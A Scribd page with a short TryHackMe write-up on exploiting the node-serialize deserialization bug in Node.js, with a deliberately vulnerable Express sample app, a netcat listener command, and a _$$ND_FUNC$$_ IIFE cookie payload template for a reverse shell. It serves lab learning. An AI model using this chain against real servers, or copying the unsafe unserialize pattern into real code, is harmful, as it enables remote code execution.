Scribd
Upload
39 views3 pages

JSON Write Up (THM)

The document discusses exploiting deserialization bugs in Node.js applications. It describes a vulnerability where untrusted data from a cookie is passed to the unserialize() function without validation. This allows crafting a malicious cookie payload that executes arbitrary code on the server when deserialized. The document provides steps to generate a reverse shell payload and trigger the bug by making a request with the encoded payload in the cookie header.

Uploaded by

Mohamed Khalil Rouissi
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
Download as pdf or txt
39 views3 pages

JSON Write Up (THM)

The document discusses exploiting deserialization bugs in Node.js applications. It describes a vulnerability where untrusted data from a cookie is passed to the unserialize() function without validation. This allows crafting a malicious cookie payload that executes arbitrary code on the server when deserialized. The document provides steps to generate a reverse shell payload and trigger the bug by making a request with the encoded payload in the cookie header.

Uploaded by

Mohamed Khalil Rouissi
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
Download as pdf or txt
Download as pdf or txt
You are on page 1/ 3

JSON write up (THM)

nodeJS / deserialization / web +

by exploiting the web found a cookie encoded in base64 and when decoding it results to :
{”email”=”<theinput>”} , also the web was using a nodejs
Exploiting Node.js deserialization bug for Remote Code Execution
Exploiting Node.js deserialization bug for Remote Code Execution 
Untrusted data passed into  unserialize()  function  in node-serialize module can be exploited to
achieve arbitrary code execution by passing a serialized JavaScript Object with an Immediately
invoked function expression (IIFE).
The Bug
During a Node.js code review, I happen to see a serialization/deserialization module named node-
serialize. A cookie value that comes from the request was passed into the  unserialize()  function
provided by the module. Here is a sample node.js application to imitate the code:

var express = require('express');


var cookieParser = require('cookie-parser');
var escape = require('escape-html');
var serialize = require('node-serialize');
var app = express();
app.use(cookieParser())

app.get('/', function(req, res) {


if (req.cookies.profile) {
var str = new Buffer(req.cookies.profile, 'base64').toString();
var obj = serialize.unserialize(str);
if (obj.username) {
res.send("Hello " + escape(obj.username));
}
} else {
res.cookie('profile', "eyJ1c2VybmFtZSI6ImFqaW4iLCJjb3VudHJ5IjoiaW5kaWEiLCJjaXR5IjoiYmFuZ2Fsb3JlIn0=", {
maxAge: 900000,
httpOnly: true
});
}
res.send("Hello World");
});
app.listen(3000);

 
Java, PHP, Ruby and Python have a fair share of Deserialization bugs. Some
resources explaining these issues: 

Understanding PHP Object InjectionJava Deserialization Cheat SheetRails Remote Code

JSON write up (THM) 1


Execution Vulnerability ExplainedArbitrary code execution with Python pickles
Further Exploitation

The vulnerability in the web application is that it reads a cookie named profile from the HTTP request,
perform base64 decode of the cookie value and pass it to unserialize() function. As cookie is an
untrusted input, an attacker can craft malicious cookie value to exploit this vulnerability.I used
nodejsshell.py for generating a reverse shell payload.

1) $ python nodejsshell.py <localip@> <port>

2) $ nc -lvnp <port>

3) Now let’s generate the serialized payload and add IIFE brackets  ()  after the function body.

{"rce":"_$$ND_FUNC$$_function (){
<code generated by nodejsshell.py>
}()"}

JSON write up (THM) 2


4) We need to perform Base64 encode of the same, and then make a request to the web server with
encoded payload in the Cookie header.

5) you get a reverse shell

JSON write up (THM) 3

You might also like